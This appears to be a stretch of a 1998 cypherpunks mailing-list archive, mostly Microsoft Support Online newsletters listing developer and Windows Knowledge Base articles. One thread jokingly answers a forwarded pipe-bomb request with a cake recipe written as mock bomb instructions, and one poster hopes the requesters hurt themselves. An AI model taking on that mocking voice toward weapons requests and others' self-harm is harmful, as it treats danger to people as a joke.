The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.0Gold (Win95; I)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_001668@news.newswire.microsoft.com>
Date: Sun, 23 Aug 1998 12:50:35 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Developer Support News Watch - July 27, 1998
Message-ID: <199808231950.MAA25688@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Developer Support News Watch
============================
As a subscriber to Developer Support News Watch, you receive e-mail
twice each month that highlights some of the new articles recently
published on Support Online, Microsoft's award-winning technical support
web site. 

Table of Contents
=================
(1) Announcements
(2) New Knowledge Base Articles
(3) Requesting Articles via E-Mail
(4) Developer Product FAQs & Support Resources
(5) Additional Resources

(1) Announcements

New Enterprise Developers section on MSDN Online!
-------------------------------------------------
Are you developing for the enterprise? This new section may be just 
what you are looking for-a quick way to find resources on the 
Microsoft Web sites that focus on topics of interest to you: 
BackOffice, Windows NT, COM, intranets, developer tools, and more. 
Come here first to map your route and save time before you delve 
into all of the resources Microsoft has to offer enterprise developers. 
You will also find great content from ZD Journals, Windows NT Magazine, 
SQL Magazine, and Software Development Magazine.  See
http://msdn.microsoft.com/developer/enterprise/

New Features Make Finding Your Answers on Support Online Even Easier
--------------------------------------------------------------------
Support Online recently released a number of new features to make it
even easier to find the answers you need. The following highlights some
of the enhancements you'll see on Support Online at
http://support.microsoft.com/.

For information about how to use these new Support Online features, see
http://support.microsoft.com/support/howto/.

- Specify an article ID number. If you know the ID number of the
  Knowledge Base article you want, you can enter the ID number
  to find that specific article.

- Search for troubleshooting tools. Now you can customize your
  search to include troubleshooting tools only.

- Search for specific drivers and other downloadable files. If you
  know the name of the driver or download file you want, enter the
  full file name to find the file on Support Online.

- See what's new. If you want to see the latest information about
  a product and/or a topic, use the What's New option and select
  the number of days you want to review. You can select 1, 3, 7,
  14, or 30 days. 

- Toggle between Advanced View and Basic View. Advanced View
  offers additional search options and other features. Now you
  can easily toggle between Advanced View and Basic View.

Need help using these features? See
http://support.microsoft.com/support/howto/.

(2) New Knowledge Base Articles
===============================
In addition to the FAQ documents mentioned below, the
following articles were recently added or updated in the
Microsoft Knowledge Base:

ActiveX Data Objects
--------------------
BUG: WillChangeRecordset Event Not Executed (191455)
http://support.microsoft.com/support/kb/articles/q191/4/55.asp
BUG: ADO Bound OLE Control Does Not Display Bitmap (191103)
http://support.microsoft.com/support/kb/articles/q191/1/03.asp
PRB: SQL Server ODBC Driver with ADO Spawns Second Connection (191085)
http://support.microsoft.com/support/kb/articles/q191/0/85.asp
PRB: Bookmarks are not Persisted or Marshalled (191084)
http://support.microsoft.com/support/kb/articles/q191/0/84.asp

ActiveX SDK
-----------
HOWTO: Run a WSH file from NT Scheduler (191430)
http://support.microsoft.com/support/kb/articles/q191/4/30.asp

Internet Explorer Development
-----------------------------
PRB: Confusing Return Values from DDE topic WWW_ListWindows (191508)
http://support.microsoft.com/support/kb/articles/q191/5/08.asp
BUG: COMP_TYPE_HTMLDOC Type Fails With AddDesktopItem (191213)
http://support.microsoft.com/support/kb/articles/q191/2/13.asp
PRB: Cannot Remove or Change Status Bar on HTML Dialog Box (191186)
http://support.microsoft.com/support/kb/articles/q191/1/86.asp
BUG: Document.Frames Collection Does Not Support For Each Syntax (191184)
http://support.microsoft.com/support/kb/articles/q191/1/84.asp
FIX: ATL Controls Don't Appear in IE When Initially Downloaded (191127)
http://support.microsoft.com/support/kb/articles/q191/1/27.asp

Internet Scripting Languages
----------------------------
BUG: Parseint Returns 0 for Some Strings with Leading Zeros (191434)
http://support.microsoft.com/support/kb/articles/q191/4/34.asp

ISAPI Development
-----------------
SAMPLE: Sample Base 64 Encoding and Decoding (191239)
http://support.microsoft.com/support/kb/articles/q191/2/39.asp

Java
----
PRB: Allowing the URL class to Access HTTPS in Applications (191120)
http://support.microsoft.com/support/kb/articles/q191/1/20.asp

Messaging (MAPI/CDO) Development
--------------------------------
HOWTO: Retrieve Original Message from Non-Delivery Receipt (191365)
http://support.microsoft.com/support/kb/articles/q191/3/65.asp
INFO: Is CDO a Redistributable Object Library? (191363)
http://support.microsoft.com/support/kb/articles/q191/3/63.asp

Visual Basic
------------
BUG: CtlPlus Sample Fails to Load (191551)
http://support.microsoft.com/support/kb/articles/q191/5/51.asp
BUG: DateTimePicker Won't Scroll Full Text in Visible Combo Area (191550)
http://support.microsoft.com/support/kb/articles/q191/5/50.asp
PRB: Visual Basic Files Are Missing From Common\Tools Directory (191546)
http://support.microsoft.com/support/kb/articles/q191/5/46.asp
FIX: DBCombo Not Appearing on SSTab After Changing Settings (191528)
http://support.microsoft.com/support/kb/articles/q191/5/28.asp
INFO: Controls Shipped in Visual Basic 6.0 (191524)
http://support.microsoft.com/support/kb/articles/q191/5/24.asp
BUG: TSQL-Debugger Not Invoked Calling Second Stored Procedure (191513)
http://support.microsoft.com/support/kb/articles/q191/5/13.asp
PRB: DataFormat Property Not Reset to Blank Value (191512)
http://support.microsoft.com/support/kb/articles/q191/5/12.asp
INFO: Palm-Size PC Does Not Support VBCE Applications (191478)
http://support.microsoft.com/support/kb/articles/q191/4/78.asp
BUG: Overflow of Number in RowHeight Property Allowed (191477)
http://support.microsoft.com/support/kb/articles/q191/4/77.asp
HOWTO: Create a Generic Error Handler for your Application (191474)
http://support.microsoft.com/support/kb/articles/q191/4/74.asp
PRB: Cannot Create Control Array in VB6 DHTML Application (191463)
http://support.microsoft.com/support/kb/articles/q191/4/63.asp
PRB: DataEnvironment Recordset Requery Does Not Refresh Controls (191457)
http://support.microsoft.com/support/kb/articles/q191/4/57.asp
PRB: Event Procedures May Be Executed for Unhandled Events (191454)
http://support.microsoft.com/support/kb/articles/q191/4/54.asp
HOWTO: Implement Multi-user Custom Counters in DAO 3.5 (191253)
http://support.microsoft.com/support/kb/articles/q191/2/53.asp
HOWTO: Use the Shared Property Manager in MTS Through VB Code (191235)
http://support.microsoft.com/support/kb/articles/q191/2/35.asp
DOC: CallByName Documentation Error (191216)
http://support.microsoft.com/support/kb/articles/q191/2/16.asp
BUG: Print Method Does Not Work Within a With-Block (191215)
http://support.microsoft.com/support/kb/articles/q191/2/15.asp
BUG: Error Message When Not Breaking Binary Compatibility (191214)
http://support.microsoft.com/support/kb/articles/q191/2/14.asp
HOWTO: Modify and Rebuild .cab Files Built with PDW (191212)
http://support.microsoft.com/support/kb/articles/q191/2/12.asp
BUG: Compile Error When You Reopen a Project That Uses Implement (191207)
http://support.microsoft.com/support/kb/articles/q191/2/07.asp
PRB: Compiler Error Overriding VBA Conversion Functions (191206)
http://support.microsoft.com/support/kb/articles/q191/2/06.asp
BUG: Run-Time Error 458 When Late-Binding Rich TextBox Control (191205)
http://support.microsoft.com/support/kb/articles/q191/2/05.asp
BUG: Cannot Edit User Defined Type in Watch Window (191201)
http://support.microsoft.com/support/kb/articles/q191/2/01.asp
PRB: Don't Modify ASP File Created by the WebClass Designer (191187)
http://support.microsoft.com/support/kb/articles/q191/1/87.asp
HOWTO: Navigate Between DHTML Designer Pages (191183)
http://support.microsoft.com/support/kb/articles/q191/1/83.asp
INFO: Fixlist for Visual Basic 6.0 for Windows as 8/7/98 (191130)
http://support.microsoft.com/support/kb/articles/q191/1/30.asp
BUG: Error Logging Could Have Problems in WebClass Designers (191125)
http://support.microsoft.com/support/kb/articles/q191/1/25.asp
DOC: CreateObject Documentation Using Servername Argument (191121)
http://support.microsoft.com/support/kb/articles/q191/1/21.asp
BUG: VB Classes Can Cause IIS to have Access Violations (191119)
http://support.microsoft.com/support/kb/articles/q191/1/19.asp
BUG: RestoreToolbar Method May Not Restore Toolbar Correctly (191105)
http://support.microsoft.com/support/kb/articles/q191/1/05.asp
PRB: Drive ListBox Fails to Drop Down with a Small FontSize (191104)
http://support.microsoft.com/support/kb/articles/q191/1/04.asp
PRB: Multiple "System Files Are Out of Date" Errors (191096)
http://support.microsoft.com/support/kb/articles/q191/0/96.asp
BUG: Error When Attempting to Update Included Files in PDW (191095)
http://support.microsoft.com/support/kb/articles/q191/0/95.asp
PRB: PDW Appends Script Information to Existing PDM File (191092)
http://support.microsoft.com/support/kb/articles/q191/0/92.asp
PRB: Multimedia API Calls May Fail with Long File Names (191089)
http://support.microsoft.com/support/kb/articles/q191/0/89.asp
BUG: IPF When Replacing Class Module with UserControl (191083)
http://support.microsoft.com/support/kb/articles/q191/0/83.asp

Visual C++
----------
BUG: VC5: Project Conversion from Version 4.x May Crash VS97 (191496)
http://support.microsoft.com/support/kb/articles/q191/4/96.asp
BUG: VC++ Tools with Long File Name (LFN) Parameters Fail on NT (191495)
http://support.microsoft.com/support/kb/articles/q191/4/95.asp
PRB: Wizard Doesn't Generate Column or Param Map for Jet (191356)
http://support.microsoft.com/support/kb/articles/q191/3/56.asp
FIX: ATL Doesn't Call InitCommonControls in ActiveX Control (191355)
http://support.microsoft.com/support/kb/articles/q191/3/55.asp
BUG: Menu Merge Problem with Server in Active Doc Container (191129)
http://support.microsoft.com/support/kb/articles/q191/1/29.asp
BUG: GetItem and SetItem Do Not Have an Indent Parameter (191128)
http://support.microsoft.com/support/kb/articles/q191/1/28.asp
PRB: Font Changes as ActiveX Control Resizes (191126)
http://support.microsoft.com/support/kb/articles/q191/1/26.asp

Visual FoxPro
-------------
HOWTO: Use UPDATE SQL Command to Modify a Second Table (191529)
http://support.microsoft.com/support/kb/articles/q191/5/29.asp
HOWTO: Implement GenHTML Functionality in VFP Run-Time App (191527)
http://support.microsoft.com/support/kb/articles/q191/5/27.asp
PRB: READ MENU In DO..WHILE Loop Causes VFP Screen to Jump (191526)
http://support.microsoft.com/support/kb/articles/q191/5/26.asp
FIX: OpenTables of Cursor Object May Fail with Locate Dialog (191525)
http://support.microsoft.com/support/kb/articles/q191/5/25.asp
FIX: TABLEUPDATE() Fails in Remote View With Empty Memo Field (191522)
http://support.microsoft.com/support/kb/articles/q191/5/22.asp
FIX: DROP TABLE Case Sensitive if Table in Persistent Relation (191521)
http://support.microsoft.com/support/kb/articles/q191/5/21.asp
PRB: Unexpected Results Display With Input Mask (191503)
http://support.microsoft.com/support/kb/articles/q191/5/03.asp
HOWTO: Use Component Gallery to Build an Application (191502)
http://support.microsoft.com/support/kb/articles/q191/5/02.asp
HOWTO: Detect If the Floppy Drive Is Ready on Windows NT (191501)
http://support.microsoft.com/support/kb/articles/q191/5/01.asp
INFO: Where to Find the Wizard Applications' Source Files (191500)
http://support.microsoft.com/support/kb/articles/q191/5/00.asp
INFO: Where to Find the Builder Applications' Source Files (191499)
http://support.microsoft.com/support/kb/articles/q191/4/99.asp
INFO: Where to Find the Class Browser Source Code Files (191498)
http://support.microsoft.com/support/kb/articles/q191/4/98.asp
HOWTO: Use Offline ADO Recordsets in Visual FoxPro (191413)
http://support.microsoft.com/support/kb/articles/q191/4/13.asp
HOWTO: Use COMCLASSINFO() to Check Installed ADO Version (191375)
http://support.microsoft.com/support/kb/articles/q191/3/75.asp
PRB: Base Table Fields Changed with Remote View (191344)
http://support.microsoft.com/support/kb/articles/q191/3/44.asp
PRB: Connection Busy Error with a Shared Connection (191343)
http://support.microsoft.com/support/kb/articles/q191/3/43.asp
FIX: Double Value Returned from DLL Gets Decimal Portion of 0 (191327)
http://support.microsoft.com/support/kb/articles/q191/3/27.asp
PRB: JAWS Software Cannot Read Some of FoxPro Menus (191326)
http://support.microsoft.com/support/kb/articles/q191/3/26.asp
FIX: Connection Designer Closes if Verify Connection Fails (191325)
http://support.microsoft.com/support/kb/articles/q191/3/25.asp
FIX: Clicking Page Does Not Call Valid of Text or Edit Box (191324)
http://support.microsoft.com/support/kb/articles/q191/3/24.asp
BUG: "Member OPTION3 Is a Class Member" Error (191323)
http://support.microsoft.com/support/kb/articles/q191/3/23.asp
PRB: SET DATASESSION TO Fails From a Method of _Screen (191316)
http://support.microsoft.com/support/kb/articles/q191/3/16.asp
BUG: ON ERROR Does Not Trap "Alias Not Found" Error (191315)
http://support.microsoft.com/support/kb/articles/q191/3/15.asp
BUG: Word Doc in Component Gallery Gives Fatal Exception Err (191313)
http://support.microsoft.com/support/kb/articles/q191/3/13.asp
BUG: Class Not Released After Being Deleting From Form (191311)
http://support.microsoft.com/support/kb/articles/q191/3/11.asp
PRB: VARTYPE() Function Returns Data Type Mismatch Error (191277)
http://support.microsoft.com/support/kb/articles/q191/2/77.asp
HOWTO: A Brief Exploration of the Project Object Model (191272)
http://support.microsoft.com/support/kb/articles/q191/2/72.asp
INFO: Files Required to View HTML Help (191223)
http://support.microsoft.com/support/kb/articles/q191/2/23.asp
INFO: ActiveX Controls Supported by Visual FoxPro 6.0 (191222)
http://support.microsoft.com/support/kb/articles/q191/2/22.asp
HOWTO: Store Multiple Dates from the MonthView Control (191175)
http://support.microsoft.com/support/kb/articles/q191/1/75.asp
HOWTO: Create a Custom HTML Help Viewer in Visual FoxPro (191174)
http://support.microsoft.com/support/kb/articles/q191/1/74.asp
HOWTO: Display Web Content in the Component Gallery (191173)
http://support.microsoft.com/support/kb/articles/q191/1/73.asp
BUG: Performance Degradation with Repeated SQL SELECTs (191172)
http://support.microsoft.com/support/kb/articles/q191/1/72.asp
PRB: Too Many Memory Variables Error Creating Array (191170)
http://support.microsoft.com/support/kb/articles/q191/1/70.asp

Visual InterDev
---------------
INFO: Visual InterDev 6.0 READMEVI.HTM file (191278)
http://support.microsoft.com/support/kb/articles/q191/2/78.asp
BUG: "HTTP 405" Error When Default Page is Requested (191276)
http://support.microsoft.com/support/kb/articles/q191/2/76.asp
BUG: All Numeric Parameter Values Treated as Integer (191275)
http://support.microsoft.com/support/kb/articles/q191/2/75.asp
BUG: Undo Design View Changes Does Not Work (191274)
http://support.microsoft.com/support/kb/articles/q191/2/74.asp
BUG: Source Code is Not Available for the Current Statement (191273)
http://support.microsoft.com/support/kb/articles/q191/2/73.asp
HOWTO: Customize the Toolbox By Adding Your Own HTML Item (191151)
http://support.microsoft.com/support/kb/articles/q191/1/51.asp
PRB: DTC Grid is Truncated or Missing Columns (191150)
http://support.microsoft.com/support/kb/articles/q191/1/50.asp
BUG: setParameter Does Not Work in Client Scripting Platform (191149)
http://support.microsoft.com/support/kb/articles/q191/1/49.asp
BUG: Incorrect Error Displayed When Copying Web Project (191148)
http://support.microsoft.com/support/kb/articles/q191/1/48.asp

Visual SourceSafe
-----------------
HOWTO: Enable Event Error Logging for FrontPage 98 & SourceSafe (191289)
http://support.microsoft.com/support/kb/articles/q191/2/89.asp

Win32 SDK
---------
BUG: Windows 98 Upgrade Overwrites Newer Oleacc.dll Versions (191476)
http://support.microsoft.com/support/kb/articles/q191/4/76.asp
BUG: List View Control Does Not Sort Items Correctly (191295)
http://support.microsoft.com/support/kb/articles/q191/2/95.asp
PRB: .inf Install Failure Occurs When Running Hhupd.exe (191124)
http://support.microsoft.com/support/kb/articles/q191/1/24.asp
HOWTO: Create Context-Sensitive HTML Help in an MFC Application (191118)
http://support.microsoft.com/support/kb/articles/q191/1/18.asp

(3) Requesting articles via e-mail
==================================

You can also receive these articles (and others) in e-mail by sending
a message to mshelp@microsoft.com. In the Subject line of your message,
enter the Article-ID number (Qnnnnnn). For example to receive Q162721,
your Subject line should resemble the following example:

   Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple
Article-ID numbers separated by a comma. For example:

   Subject: Q178049, Q174914, Q174062

To receive an index of articles, enter "Index" (without quotation marks)
in the Subject line. For example:

   Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp,
see http://support.microsoft.com/support/kb/articles/q183/1/21.asp.

Visit Support Online
--------------------

We also encourage you to visit Support Online at
http://support.microsoft.com/support/ to see our complete selection of
helpful information designed to answer questions about using Microsoft
products.

(4) Developer Product FAQs & Support Resources
==============================================
Here's some highlights and pointers to the latest information on
Microsoft Developer Tools:

Visual Studio 97 Service Pack Released: Visual Studio 97 Service Pack 3
contains bug fixes for many tools, and is now available for developers
who use any of the Visual Studio tools. See
http://msdn.microsoft.com/vstudio/sp/ for the latest information.

Visual BASIC Frequently Asked Questions:
For pointers to the latest Visual BASIC FAQ's, see
http://support.microsoft.com/support/vbasic/faq/default.asp

Visual C++ 5.0 (Professional & Enterprise)
Frequently Asked Questions - FAQ (Q167654), see
http://support.microsoft.com/support/kb/articles/Q167/6/54.asp

Visual FoxPro 5.0 Frequently Asked Questions (FAQ), see
http://support.microsoft.com/support/vfoxpro/content/faq
/vfoxpro/vfp50win/default.asp

Visual J++ Frequently Asked Questions - FAQ (Q169173), see
http://support.microsoft.com/support/kb/articles/Q169/1/73.asp

Visual InterDev Commonly Referenced KB Articles: These articles are 
frequently used to help resolve issues, or address common development 
needs. Be sure to take a look here for an issue you might have. See 
http://support.microsoft.com/support/vinterdev/kbtips.asp

Microsoft SourceSafe Frequently Asked Questions (FAQ) (Q134369), see
http://support.microsoft.com/support/kb/articles/Q134/3/69.asp

Microsoft Developer Support Messaging Frequently Asked Questions (FAQ)
http://support.microsoft.com/support/messagingsdk/faq/default.asp

Multimedia Sample Projects:
Add multimedia functionality to your Visual Basic program by using the
techniques in these Visual Basic sample projects. See
http://support.microsoft.com/support/vbasic/vbmm.asp

Active Template Library (ATL) Frequently Asked Questions (Q166480), see
http://support.microsoft.com/support/kb/articles/Q166/4/80.asp

Popular MFC Samples--created by support engineers for MFC developers.
See http://support.microsoft.com/support/visualc/atlmfc/samples.asp

OLE Automation Using MFC
For the latest articles about automating Microsoft Office 97 components
using the Microsoft Foundation Classes (MFC), see
http://support.microsoft.com/support/visualc/atlmfc/oleatmfc.asp

VBA Software Development Kit Frequently Asked Questions - FAQ (Q170298)
http://support.microsoft.com/support/kb/articles/Q170/2/98.asp

COM Security Frequently Asked Questions - FAQ (Q158508), see
http://support.microsoft.com/support/kb/articles/Q158/5/08.asp

ADC 1.0 FAQ Available for Download (Q165292), see
http://support.microsoft.com/support/kb/articles/Q165/2/92.asp
Or download directly from:
http://support.microsoft.com/download/support/mslfiles/ADC10FAQ.EXE

Visual Modeler 1.0 Frequently Asked Questions (FAQ)(Q166395), see
http://support.microsoft.com/support/kb/articles/Q166/3/95.asp

ActiveX Data Objects (ADO) Frequently Asked Questions (Q183606)
http://support.microsoft.com/support/kb/articles/Q183/6/06.asp

Microsoft Internet Finance Server Toolkit (MIFST) Frequently Asked
Questions (Q182448)
http://support.microsoft.com/support/kb/articles/Q182/4/48.asp

Developing with the ActiveX SDK - FAQ (Q158264), see
http://support.microsoft.com/support/kb/articles/Q158/2/64.asp

Developing with the Internet Client SDK - FAQ (Q167435), see
http://support.microsoft.com/support/kb/articles/Q167/4/35.asp

SDK for Java Frequently Asked Questions - FAQ (Q168942), see
http://support.microsoft.com/support/kb/articles/Q168/9/42.asp

Microsoft SDK for Java Release:
Go to this page to download the latest released Microsoft SDK for
Java, which contains the current Java VM for IE, support
for JDK 1.1, J/Direct, AFC, samples, the latest Java compiler,
and documentation.  See http://www.microsoft.com/java/download.htm

The latest Microsoft VM for Java: Easily upgrade to the latest VM,
See http://www.microsoft.com/java/vm/dl_vmsp2.htm

Java/COM/DCOM Frequently Asked Questions - FAQ (Q168935), see
http://support.microsoft.com/support/kb/articles/Q168/9/35.asp

CAB Files Frequently Asked Questions - FAQ (Q168941), see
http://support.microsoft.com/support/kb/articles/Q168/9/41.asp

AFC Frequently Asked Questions - FAQ (Q168943)
http://support.microsoft.com/support/kb/articles/Q168/9/43.asp


(5) Additional Resources
========================
In addition, the following resources might prove helpful:

MSDN
----
Check out the MSDN "Buzz" for the latest information on Microsoft's
developer tools and strategies: 
http://msdn.microsoft.com/developer/default.htm

SiteBuilder's Network
---------------------
For the latest and greatest information about Internet technologies,
the Microsoft SiteBuilder Network can be found at:
http://www.microsoft.com/sitebuilder/

Enterprise Developers
---------------------
This new MSDN site has a focus on topics of interest to enterprise and 
corporate developers:
http://msdn.microsoft.com/developer/enterprise/

The TechNet site, ITHome, which offers comprehensive resources for
corporate and enterprise customers: http://www.microsoft.com/ithome/

Developer Tools
---------------
For links to specific developer tools products and technologies, 
refer to:
Products:  http://msdn.microsoft.com/developer/products/
Technologies:  http://msdn.microsoft.com/developer/techsite/



Sincerely,
The Microsoft Support Online Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://events.microsoft.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infonex.com>
Date: Sun, 23 Aug 1998 11:36:23 -0700 (PDT)
To: Reeza! <howree@cable.navy.mil>
Subject: Re: Pipe
In-Reply-To: <3.0.5.32.19980824022247.008ef350@205.83.192.13>
Message-ID: <Pine.SOL.3.96.980823113639.29011A-100000@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



Eww, garlic in a sweetbread? I would say zucchini or carrots. *grin*

On Mon, 24 Aug 1998, Reeza! wrote:

>You forgot to slice it, and to add the garlic, and butter,,,,<heeeheee>
>
>At 06:37 AM 8/21/98 -0400, Rabid Wombat wrote:
>>
>>On Fri, 21 Aug 1998, Marc Maffei wrote:
>>
>>> please somebody give them the info so that they take themselves out of our
>>> misery, since obviously they will botch the job and will give us great
>>> pleasure with all the fireworks.
>>> 
>>> >>>Send me info on how to make a pipe bomb. HoppyF1315
>>
>>OK-
>>
>>THIS INFORMATION IS PROVIDED FOR EDUCATIONAL USE ONLY! DO NOT TRY THIS AT 
>>HOME, UNLESS YOU KNOW WHAT YOU ARE DOING!!! BETTER YET, DO NOT ACTUALLY 
>>USE THESE INSTRUCTIONS, AND BE CAREFUL WHO YOU SHARE THEM WITH! IT IS 
>>MUCH SAFER IF YOU HAVE STUDIED THIS IN SCHOOL, AND ARE NOT A RANK AMATUER!
>>
>>Here's something you can make using basic household chemicals, in your
>>kitchen. Be careful, or you'l make a real mess. You can make several
>>seperate batches of this, and combine after cooled, but don't try making
>>larger batches in one pass, as this can get out of hand quickly. (Sorry,
>>but I don't have the metric conversions for this - you're on your own
>>there, and this won't really live up to expectations if you use metric 
>>conversion, anyway ...)
>>
>>Carefully sift a pound of household flour, gradually combining with 1/2
>>teaspoon sodium chloride. Be sure that the mixture is uniform, without
>>clumping.  Aerate until smooth (in a non-reactive vessel, such as a PYREX
>>bowl) a pound of emulsified milk fat, and gradually add 1 pound of
>>granulated sucrose (available at the grocer's). Add the yolks from 10
>>eggs. Use a hand mixer to mix this, and get the mixture as "LITE" as
>>possible. Sift the sifted flour/sodium chloride mixture in very slowly -
>>MAKE SURE TO KEEP THE MIXTURE UNIFORM, AND DON'T ALLOW "LUMPS" TO FORM -
>>IF YOU BEGIN TO SEE THIS, SLOW DOWN THE RATE AT WHICH YOU ARE ADDING THE
>>BASE flour/Sodium Chloride MIX, AND STIR BETTER! Stir in a teaspoon of
>>extract of vanilla (CAUTION, THIS CONTAINS ALCOHOL, WHICH IS FLAMMABLE!)
>>and make sure to distribute evenly throughout the mixture. Add a 1/2
>>teaspoon of Citric Acid in an aqueous solution. Carefully add the egg
>>whites, distributing evenly.  Continue to stir this mixture until it
>>starts to become stiff and hard to stir, but TAKE CARE THAT IT DOES NOT
>>BEGIN TO BECOME DRY (stop mixing before it reaches this point!).  Use
>>butter or shortening to grease the inside of two bread loaf pans SO THAT
>>THE MIXTURE DOES NOT STICK TO THE SIDES OF THE METAL PANS.  Pour half of
>>the mixture SLOWLY into each pan. Use an oven to "bake" this mixture - let
>>the oven heat up to 300 degrees (farenheit), then put the pans in. You
>>will need about 1.25 hours for the heat conversion to occur. Be sure NOT
>>TO LEAVE THE PANS IN TOO LONG!!! If you see that the mixture is taking on
>>a "DRY" LOOK, or is "SHRINKING" AWAY FROM THE SIDES OF THE PAN, CAREFULLY
>>REMOVE AT ONCE!! MAKE SURE TO HANDLE THE PANS WITH PROTECTIVE GLOVES, AS
>>THEY WILL BE HOT! YOU DON'T WANT TO DROP THIS ON THE FLOOR AT THIS POINT!
>>Carefully set the pans down (slowly) where the heat from the pans will not
>>cause damage, and where the pans can be LEFT UNDISTURBED for several
>>hours. Allow the mixture to cool until the sides and the bottom of the pan
>>are cool to the touch - at this moint, the mixture will be safe to handle. 
>>
>>This should make enough to fill several pipes, depending on size. Be very 
>>careful when packing the mixture into the pipe, and make sure that you 
>>don't get any of the mixture into the pipe threads, as this can get very 
>>messy. 
>>
>>
>>
>
>	"Nothing is impossible for the man who doesn't have to do it 
>	himself." 
>						--Weiler's Law
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_001689@news.newswire.microsoft.com>
Date: Sun, 23 Aug 1998 14:20:19 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Windows and Internet Explorer Support News Watch - August 24, 1998
Message-ID: <199808232120.OAA26204@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Windows and Internet Explorer Support News Watch
================================================

TABLE OF CONTENTS
-----------------

 New Support Online Articles
     Windows 98
     Internet Explorer for Windows 95 and Windows NT
     Windows CE
     Windows 95
     Internet Explorer for UNIX

 Get Support Online Articles by E-mail

 Visit Support Online


As a subscriber to the Windows and Internet Explorer Support News Watch
you receive e-mail twice each month that highlights some of the new articles recently published on Support Online
Microsoft's award-winning technical support web site. The following are new Support Online articles that answer frequently asked questions about using Windows and Internet Explorer:


Windows 98
----------

Setup Does Not Detect Multiple Display Adapters Correctly (Q191622)
http://support.microsoft.com/support/kb/articles/q191/6/22.asp

Err Msg: WAOL Caused an Invalid Page Fault in Module MSVCRT.DLL (Q191621)
http://support.microsoft.com/support/kb/articles/q191/6/21.asp

Err Msg: Explorer Caused an Invalid Page Fault in Module... (Q191609)
http://support.microsoft.com/support/kb/articles/q191/6/09.asp

Dialog Box Containing No Text Appears When Windows 98 Starts (Q191604)
http://support.microsoft.com/support/kb/articles/q191/6/04.asp

Missing Drives in My Computer and Windows Explorer (Q191579)
http://support.microsoft.com/support/kb/articles/q191/5/79.asp

Err Msg: Internal Error 45: Your Infrared Software Has... (Q191578)
http://support.microsoft.com/support/kb/articles/q191/5/78.asp

Cannot Access Post Office with Windows Messaging (Q191576)
http://support.microsoft.com/support/kb/articles/q191/5/76.asp

System Configuration Utility Does Not Disable Files (Q191547)
http://support.microsoft.com/support/kb/articles/q191/5/47.asp

Windows 98 Dial-up Networking Security Upgrade Available (Q191540)
http://support.microsoft.com/support/kb/articles/q191/5/40.asp

HP ScanJet 5p Does Not Function After Upgrade to Windows 98 (Q191530)
http://support.microsoft.com/support/kb/articles/q191/5/30.asp

Cannot Print in Windows After Upgrading to Windows 98 (Q191516)
http://support.microsoft.com/support/kb/articles/q191/5/16.asp

Dxinfo.exe Tool Reports That the Directx.cpl File Is Missing (Q191490)
http://support.microsoft.com/support/kb/articles/q191/4/90.asp

Hard Disk Is Low on Disk Space Message During Windows 98 Setup (Q191489)
http://support.microsoft.com/support/kb/articles/q191/4/89.asp

Network Connections Unavailable After You Connect to Network (Q191481)
http://support.microsoft.com/support/kb/articles/q191/4/81.asp

Err Msg: The Telephony System Cannot Perform That Function at... (Q191468)
http://support.microsoft.com/support/kb/articles/q191/4/68.asp

Using ToggleKeys Feature Causes Sounds to Be Played Quietly (Q191458)
http://support.microsoft.com/support/kb/articles/q191/4/58.asp

Internet Explorer Does Not Save Connection Settings (Q191451)
http://support.microsoft.com/support/kb/articles/q191/4/51.asp

Err Msg: Error 633: The Modem Is Not Installed or Configured... (Q191444)
http://support.microsoft.com/support/kb/articles/q191/4/44.asp

Err Msg: Drive Converter Was Unable to Get a Lock on the Drive (Q191442)
http://support.microsoft.com/support/kb/articles/q191/4/42.asp

Sierra Semiconductor 33.6 Modem Does Not Work Correctly (Q191422)
http://support.microsoft.com/support/kb/articles/q191/4/22.asp

Roaming Profiles Do Not Always Update Correctly (Q191416)
http://support.microsoft.com/support/kb/articles/q191/4/16.asp

"Please Wait While Setup Searches for..." Message Appears (Q191392)
http://support.microsoft.com/support/kb/articles/q191/3/92.asp

Computer Appears to Stop Responding During Windows 98 Setup (Q191391)
http://support.microsoft.com/support/kb/articles/q191/3/91.asp

Not Enough Disk Space Error Message During Windows 98 Setup (Q191369)
http://support.microsoft.com/support/kb/articles/q191/3/69.asp

ScanDisk Stops Responding During Windows 98 Setup (Q191366)
